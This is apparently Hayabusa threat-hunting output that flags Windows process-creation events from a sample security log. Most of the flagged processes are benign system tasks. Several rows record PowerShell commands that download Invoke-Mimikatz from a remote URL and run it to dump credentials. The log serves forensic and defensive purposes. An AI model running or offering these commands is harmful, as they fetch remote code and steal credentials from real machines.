+2016-08-23 09:13:00.062 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x754 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-23 09:13:02.593 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x920 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-23 09:15:59.673 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0xdfc | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-23 09:23:16.845 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\makecab.exe"" C:\Windows\Logs\CBS\CbsPersist_20160823002316.log C:\Windows\Logs\CBS\CbsPersist_20160823002316.cab | Path: C:\Windows\System32\makecab.exe | PID: 0xf7c | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-23 09:28:51.548 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x3d0 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-23 09:28:51.611 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan -Reinvoke | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xb50 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-23 09:28:51.626 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" SignaturesUpdateService -ScheduleJob | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xad4 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-23 09:30:51.548 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe aepdu.dll,AePduRunUpdate | Path: C:\Windows\System32\rundll32.exe | PID: 0xc44 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-25 06:17:10.062 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x478 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-25 06:17:10.109 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x6f4 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-25 06:20:07.546 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0xe90 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-25 06:21:09.562 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x708 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-25 06:21:09.578 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{6D9A7A40-DDCA-414E-B48E-DFB032C03C1B} | Path: C:\Windows\System32\dllhost.exe | PID: 0xec8 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-25 06:25:05.171 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"" ""IEX (New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI'); Invoke-Mimikatz -DumpCreds -ComputerName @('computer1', 'computer2')"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xd10 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-25 06:25:05.171 +09:00,IE10Win7,4688,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-25 06:25:59.734 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"" ""IEX (New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI'); Invoke-Mimikatz -DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x4a8 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-25 06:25:59.734 +09:00,IE10Win7,4688,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-25 06:26:37.046 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"" ""IEX (New-Object Net.WebClient).DownloadString('https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x9ec | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-25 06:26:37.046 +09:00,IE10Win7,4688,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-25 06:27:31.828 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"" ""IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x7a4 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-25 06:27:31.828 +09:00,IE10Win7,4688,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-25 06:28:35.375 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\wuauclt.exe"" /RunHandlerComServer | Path: C:\Windows\System32\wuauclt.exe | PID: 0xb3c | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-25 06:29:40.093 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" | Path: C:\Windows\System32\mmc.exe | PID: 0xf74 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-25 06:30:06.203 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"" ""IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x2a4 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-25 06:30:06.203 +09:00,IE10Win7,4688,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-25 06:38:23.076 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"" ""IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xa9c | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-25 06:38:23.076 +09:00,IE10Win7,4688,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-25 06:51:10.232 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"" ""IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x4fc | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-25 06:51:10.232 +09:00,IE10Win7,4688,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-25 06:51:19.681 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"" ""IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe70 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-25 06:51:19.681 +09:00,IE10Win7,4688,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-25 07:00:00.553 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0x97c | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-25 07:01:50.906 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xd1c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-25 07:01:50.943 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x904 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-25 07:42:19.877 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc34 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-25 07:42:28.120 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xbf4 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-25 07:42:44.834 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xd18 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-25 07:43:00.291 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x3a8 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-25 07:43:04.576 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\hp2phgfx.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | PID: 0xd50 | User: IEUser | LID: 0x4d011",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-25 07:44:00.792 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xd08 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-25 07:44:00.843 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xb70 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-25 07:44:02.654 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\lnyiquaj.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | PID: 0x818 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-25 07:45:43.530 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xce4 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-25 07:45:43.908 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x3a0 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-25 07:45:45.304 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\zqai1ke3.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | PID: 0xb8c | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-25 07:45:54.936 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xe48 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-25 07:45:54.972 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xf88 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-25 07:45:57.041 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\lygfnats.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | PID: 0x21c | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-25 07:47:33.985 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xcd8 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-25 07:47:34.016 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xd48 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-25 07:49:42.000 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\findstr.exe"" ""Command Line"" | Path: C:\Windows\System32\findstr.exe | PID: 0x708 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-25 07:50:40.032 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\findstr.exe"" Command | Path: C:\Windows\System32\findstr.exe | PID: 0x6e0 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-25 07:53:47.579 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\findstr.exe"" ""Command Line"" | Path: C:\Windows\System32\findstr.exe | PID: 0xebc | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-25 07:54:04.375 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\findstr.exe"" ""Command Line"" | Path: C:\Windows\System32\findstr.exe | PID: 0xb78 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-25 07:59:07.782 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\findstr.exe"" csc | Path: C:\Windows\System32\findstr.exe | PID: 0x9c8 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-25 08:01:26.782 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xa00 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-25 08:01:26.782 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x5b8 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-26 00:03:05.916 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x108 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
